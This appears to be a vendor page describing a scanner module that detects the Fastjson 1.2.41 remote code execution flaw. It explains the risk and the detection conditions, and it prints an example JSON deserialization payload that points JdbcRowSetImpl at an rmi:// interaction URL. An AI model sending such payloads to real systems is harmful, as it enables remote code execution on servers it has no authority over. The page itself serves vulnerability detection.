Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
The "Fastjson 1.2.41 - Remote Code Execution" module is designed to detect a critical vulnerability in the Fastjson 1.2.41 software. Fastjson is a Java library used for parsing and generating JSON data. This module specifically targets the Fastjson version 1.2.41 and aims to identify instances where remote code execution (RCE) can occur.
This vulnerability poses a significant risk as it allows attackers to execute arbitrary code on the target system, potentially leading to unauthorized access, data breaches, and system compromise. It is crucial to address this vulnerability promptly to prevent potential exploitation.
The severity of this vulnerability is classified as critical, indicating the high potential for damage and the urgent need for mitigation.
If successfully exploited, the "Fastjson 1.2.41 - Remote Code Execution" vulnerability can allow attackers to execute arbitrary code on the target system. This can lead to various consequences, including:
- Unauthorized access to sensitive data - System compromise - Execution of malicious commands - Disruption of servicesGiven the severity of this vulnerability, it is crucial to take immediate action to remediate the issue and protect the affected systems.
The "Fastjson 1.2.41 - Remote Code Execution" module works by sending a crafted HTTP request to the target system. The request is designed to exploit the specific vulnerability present in Fastjson 1.2.41, which allows for remote code execution.
One example of the HTTP request used by this module is:
POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/json
{
"@type":"Lcom.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://<InteractionURL>/Exploit",
"autoCommit":true
}
The module includes matching conditions to determine if the vulnerability is present. In this case, the matching conditions include:
- Checking for the presence of the "dns" protocol in the response - Verifying that the HTTP response status is not 200If both matching conditions are met, the module identifies the presence of the vulnerability and reports it as a critical issue.
It is essential to regularly scan and patch systems running Fastjson 1.2.41 to mitigate the risk of remote code execution.